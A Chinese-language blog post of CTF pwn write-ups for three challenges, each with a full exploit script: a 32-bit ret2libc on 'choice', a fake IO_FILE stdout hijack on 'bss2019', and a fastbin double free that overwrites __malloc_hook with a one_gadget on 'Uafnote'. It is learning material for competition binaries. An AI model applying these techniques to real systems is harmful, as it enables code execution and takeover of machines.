博客终于搭好啦,补一下这学期打的比赛做的题目的wp,好多都只做了题没写题解(以后得养成好习惯)
choice
覆盖可写入字数为\xff实现``栈溢出``,32位的ret2libc直接打
(And mark一下打不通的时候想想是不是``sl``和``sd``没搞清)
覆盖可写入字数为\xff实现``栈溢出``,32位的ret2libc直接打
(And mark一下打不通的时候想想是不是``sl``和``sd``没搞清)
from Excalibur import*
contextset(32)                       # 32-bit target (the writeup calls this a 32-bit ret2libc)
proc('./choice')                     # run the challenge binary locally; remo() below is the remote variant
#remo('39.108.173.13:35234')
el('./choice')                       # load the binary so plt()/got() can resolve symbols
lib('./libc-2.23.so')                # libc the challenge ships with (used by searchlibc() further down)
puts_plt = plt('puts')
puts_got = got('puts')
stdout = 0x0804A044                  # only referenced by the commented-out fflush variant of `pay`
fflush_plt = plt('fflush')           # likewise unused in the active payload
#back = 0x0804857B
back = 0x080485BB                    # address the first payload returns to, so the prompts come round a second time
debug('b *0x8048727\n')              # debugger breakpoint script; only meaningful for a local run — TODO confirm debug() is a no-op otherwise
sda(b' name:',b'\x00'*20+b'\xff')    # 20 NULs then 0xff: overwrites the "writable count" byte to 0xff (see the writeup) so the later input overflows
sda(b'now',b'1')
pay = b'a'*(0x1c+4)+p32(puts_plt)+p32(back)+p32(puts_got)   # 0x1c buffer + 4 (presumably saved ebp), then puts(puts_got) returning to `back`
#pay = b'a'*(0x1c+4)+p32(puts_plt)+p32(fflush_plt)+p32(puts_got)+p32(stdout)
sda(b'it?',pay)
real_addr = get_addr32()             # read back the 4-byte address puts printed (Excalibur helper; exact parsing assumed)
prh(real_addr)
sda(b' name:',b'\x00'*20+b'\xff')    # second round: same count overwrite as above
sda(b'now',b'1')
binsh,system = searchlibc('puts',real_addr,1)   # resolve "/bin/sh" and system from the leaked puts address (Excalibur helper)
pay2 = b'a'*(0x1c+4)+p32(system)+b'aaaa'+p32(binsh)   # same padding, then system with a dummy return address and binsh as its argument
sda(b'it?',pay2)
ia()                                 # presumably interactive()
bss2019
给gift得到程序基地址,泄露``stdout``得到libc,bss超长长度溢出,然后开始懵逼
可以构造伪造fake_io_file,``stdout``指过来执行
参考链接
IO_FILE学习
Pwn_IO_FILE.md
[古剑山2023] pwn
给gift得到程序基地址,泄露``stdout``得到libc,bss超长长度溢出,然后开始懵逼
可以构造伪造fake_io_file,``stdout``指过来执行
参考链接
IO_FILE学习
Pwn_IO_FILE.md
[古剑山2023] pwn
0x5558fce02020 <stdout>: 0x00007f4208bc7620 0x0000000000000000
0x5558fce02030 <stdin>: 0x00007f4208bc68e0 0x0000000000000000
0x5558fce02040 <stderr>: 0x00007f4208bc7540 0x0000000000000000
0x5558fce02050: 0x000000003b687320 0x0000000000000000
0x5558fce02060: 0x0000000000000000 0x0000000000000000
0x5558fce02070: 0x0000000000000000 0x0000000000000001
0x5558fce02080: 0x0000000000000000 0x0000000000000000
0x5558fce02090: 0x0000000000000000 0x0000000000000000
0x5558fce020a0: 0x0000000000000000 0x0000000000000000
0x5558fce020b0: 0x0000000000000000 0x0000000000000000
0x5558fce020c0: 0x0000000000000000 0x0000000000000000
0x5558fce020d0: 0x0000000000000000 0x00005558fce02200
0x5558fce020e0: 0x0000000000000000 0x0000000000000000
0x5558fce020f0: 0x0000000000000000 0x0000000000000000
0x5558fce02100: 0x0000000000000000 0x0000000000000000
0x5558fce02110: 0x0000000000000000 0x0000000000000000
0x5558fce02120: 0x0000000000000000 0x00005558fce02128
0x5558fce02130: 0x0000000000000000 0x0000000000000000
0x5558fce02140: 0x0000000000000000 0x0000000000000000
0x5558fce02150: 0x0000000000000000 0x0000000000000000
from Excalibur import*
contextset()        # default context (presumably 64-bit, given the p64/get_addr64 use below), unlike the 32-bit `choice` script
proc('./pwn')
def read(off,size,data):
    """Menu option 2: answer the Offset/Size/data prompts with `off`, `size`, `data`.

    Despite the name this sends `data` into the program (the target's "read"
    is our write).  Every value is handed to `sla` unchanged, so the callers
    pass bytes.
    """
    prompts = (b'Choice:', b'Offset:', b'Size:', b'data:')
    answers = (b'2', off, size, data)
    for prompt, answer in zip(prompts, answers):
        sla(prompt, answer)
def write(off):
    """Menu option 1: select it, then answer the Offset prompt with `off` (bytes)."""
    for prompt, answer in ((b'Choice:', b'1'), (b'Offset:', off)):
        sla(prompt, answer)
el('./pwn')
puts_got = got('puts')              # computed but not used below
ru(b'0x')
base = int(ru(b'\n'),16)-0x202060   # program base from the "gift" pointer: the printed address sits at file offset 0x202060
prh(base)
debug('b *$rebase(0xAAA)\nb *$rebase(0xB60)\n')   # PIE-relative local breakpoints
write(b'-64')                       # option 1 at offset -64: 0x202060-64 = 0x202020, the stdout slot in the dump above -> leaks the stdout pointer
real_addr = get_addr64()            # Excalibur helper; reads the 8-byte leak
lib('./libc-2.23.so')
offset = libcsym('_IO_2_1_stdout_')  # `offset`/`libcbase` are computed but unused; searchlibc() below does the same resolution
libcbase = real_addr - offset
binsh,system = searchlibc('_IO_2_1_stdout_',real_addr,1)
io_file = b' sh;'+p32(0) + p64(0)*4 + p64(1)                        # fake FILE: b' sh;' at +0 (0x3b687320 in the dump) and 1 at +0x28
io_file = io_file.ljust(0x88,b'\x00') + p64(base + 0x202200)         # +0x88 -> base+0x202200 (the 0x...20d8 entry in the dump)
io_file = io_file.ljust(0xd8,b'\x00') + p64(base + 0x202050 + 0xd8) #ptr->self
io_file += b'\x00'*0x30 + p64(system)                                # +0xe0: 0x30 NULs, then system at +0x110 (which FILE field this is is not stated on the page)
read(b'-16',b'-1',io_file)          # option 2 at offset -16 (= 0x202050) with size -1: the over-long bss write places the fake FILE
read(b'-64',b'8',p64(base +0x202050))   # overwrite the stdout pointer (0x202020) with the fake FILE's address
ia()                                # presumably interactive()
Uafnote
Double free 打fast bin attack
from evilblade import *
context(os='linux', arch='amd64')                       # redundant: replaced by the call on the next line
context(os='linux', arch='amd64', log_level='debug')    # debug logging prints every send/recv; noisy but handy while aligning the heap steps
setup('./pwn')
libset('./libc-2.23.so')
rsetup('39.108.173.13',30676)                           # hard-coded remote CTF instance (evilblade helper)
def add(size,data):
    """Menu option 1 ("add"): send `size` (str()-converted) then `data` as-is."""
    steps = (('>', b'1'), (':', str(size)), (':', data))
    for prompt, answer in steps:
        sla(prompt, answer)
def free(idx):
    """Menu option 2 ("free"): send the note index `idx` (str()-converted)."""
    steps = (('>', b'2'), (':', str(idx)))
    for prompt, answer in steps:
        sla(prompt, answer)
def show(idx):
    """Menu option 3 ("show"): send the note index `idx` (str()-converted)."""
    steps = (('>', b'3'), (':', str(idx)))
    for prompt, answer in steps:
        sla(prompt, answer)
def edit(idx,size,content):
    """Menu option 4 ("edit"): send `idx`, `size` (both str()-converted) and `content` as-is."""
    steps = (('>', b'4'), (':', str(idx)), (':', str(size)), (':', content))
    for prompt, answer in steps:
        sla(prompt, answer)
add(0x80,b'6')              # idx 0: the only 0x80-size note; its freed contents are read back by show(0)
add(0x68,b'target1')        # idx 1..3: 0x68-size notes used for the double free
add(0x68,b'a'*0x20)
add(0x68,b'target2')
add(0x68,b'/bin/sh\x00')    # idx 4: not referenced again in the active code (the commented-out add at the end re-adds it)
evgdb()                     # attach the debugger (evilblade helper); local use only
free(0)
show(0)                     # use-after-free read: the freed note is still shown
libc = getx64(0,-1)-0x3c4b78   # leaked pointer minus its libc-2.23 offset -> libc base (getx64 parsing assumed)
dpx('libc',libc)
free(1)
free(3)
free(1)                     # idx 1 freed twice with idx 3 in between: the fastbin double free from the writeup
hook = symoff('__malloc_hook',libc)-0x23   # __malloc_hook minus 0x23; the author does not explain the offset on this page
add(0x68,p64(hook))         # the three adds drain the doubly-freed chunk; the first writes `hook` as its fd
add(0x68,p64(hook))
add(0x68,p64(hook))
og = [0x45226,0x4527a,0xf03a4,0xf1247,0xef6c4,0xf0567]   # one_gadget offsets for libc-2.23; constraints for the first four are listed in the string below
sys = libc+ og[3]#one_shot   # 0xf1247, whose listed constraint is [rsp+0x70] == NULL
#sys = symoff('system',libc)
add(0x68,b'a'*(0x23-0x10)+p64(sys))   # 0x13 bytes of padding then `sys`; assuming the returned pointer is hook+0x10, this lands on __malloc_hook
#add(0x68,b'/bin/sh\x00')
sla(b">> ", b'1')           # prompt given as b">> " here but '>' in the helpers — TODO confirm which the binary actually prints
sla(b"size:", b'8')         # one more allocation goes through __malloc_hook
ia()                        # presumably interactive()
"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
"""